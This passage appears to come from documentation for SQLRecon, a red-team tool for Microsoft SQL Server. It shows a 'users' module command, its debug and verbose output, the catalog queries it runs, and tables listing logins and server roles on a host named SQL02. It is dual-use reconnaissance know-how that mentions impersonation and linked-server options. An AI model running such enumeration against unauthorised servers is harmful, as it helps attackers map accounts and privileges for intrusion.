|-> Application Name: DESKTOP-LF8Q3C6
[DEBUG] Module: users
|-> Number of required standard arguments: 0
|-> Number of required impersonate arguments: 1
|-> Number of required linked arguments: 2
[DEBUG] Context Selected: Standard
|-> Module: users
|-> Number of required arguments: 0
[*] Executing the 'users' module on SQL02
[*] Users in the 'master' database
[DEBUG] Query:
|-> SELECT name AS username, create_date, modify_date, type_desc AS type, authentication_type_desc AS authentication_type FROM sys.database_principals WHERE type NOT IN ('A', 'R', 'X') AND sid IS NOT null AND name NOT LIKE '##%' ORDER BY modify_date DESC;
[*] Server principals
[DEBUG] Query:
|-> SELECT name, type_desc, is_disabled, create_date, modify_date FROM sys.server_principals WHERE name NOT LIKE '##%' ORDER BY modify_date DESC;
SQLRecon.exe /a:WinToken /h:SQL02 /m:users /verbose
Expected Output:
[VERBOSE] CLI Arguments:
|-> /auth:WinToken
|-> /host:SQL02
|-> /module:users
|-> /verbose:
[VERBOSE] Connecting to 'master' on SQL02:1433 using wintoken.
|-> Connection String: Server=SQL02,1433; Database=master; Integrated Security=True; Connect Timeout=3;
|-> Data Source: SQL02,1433
|-> Database: master
|-> Server Version: 16.00.1000
|-> State: Open
|-> Workstation ID: DESKTOP-LF8Q3C6
|-> Packet Size: 8000
|-> Client Connection ID: 1de59e23-d271-4c09-957a-38c706a21103
|-> Application Name: DESKTOP-LF8Q3C6
[*] Executing the 'users' module on SQL02
[*] Users in the 'master' database
[VERBOSE] Query:
|-> SELECT name AS username, create_date, modify_date, type_desc AS type, authentication_type_desc AS authentication_type FROM sys.database_principals WHERE type NOT IN ('A', 'R', 'X') AND sid IS NOT null AND name NOT LIKE '##%' ORDER BY modify_date DESC;
| username | create_date | modify_date | type | authentication_type |
| -------- | ------------------- | ------------------- | -------- | ------------------- |
| guest | 4/8/2003 9:10:19 AM | 4/8/2003 9:10:19 AM | SQL_USER | NONE |
| dbo | 4/8/2003 9:10:19 AM | 4/8/2003 9:10:19 AM | SQL_USER | INSTANCE |
[*] Server principals
[VERBOSE] Query:
|-> SELECT name, type_desc, is_disabled, create_date, modify_date FROM sys.server_principals WHERE name NOT LIKE '##%' ORDER BY modify_date DESC;
| name | type_desc | is_disabled | create_date | modify_date |
| ------------- | ------------- | ----------- | --------------------- | --------------------- |
| sa | SQL_LOGIN | False | 4/8/2003 9:10:35 AM | 6/20/2024 3:23:19 PM |
| BUILTIN\Users | WINDOWS_GROUP | False | 4/24/2023 2:53:47 PM | 4/24/2023 2:53:47 PM |
| public | SERVER_ROLE | False | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |
| sysadmin | SERVER_ROLE | False | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |
| securityadmin | SERVER_ROLE | False | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |
| serveradmin | SERVER_ROLE | False | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |
| setupadmin | SERVER_ROLE | False | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |
| processadmin | SERVER_ROLE | False | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |
| diskadmin | SERVER_ROLE | False | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |
| dbcreator | SERVER_ROLE | False | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |
| bulkadmin | SERVER_ROLE | False | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |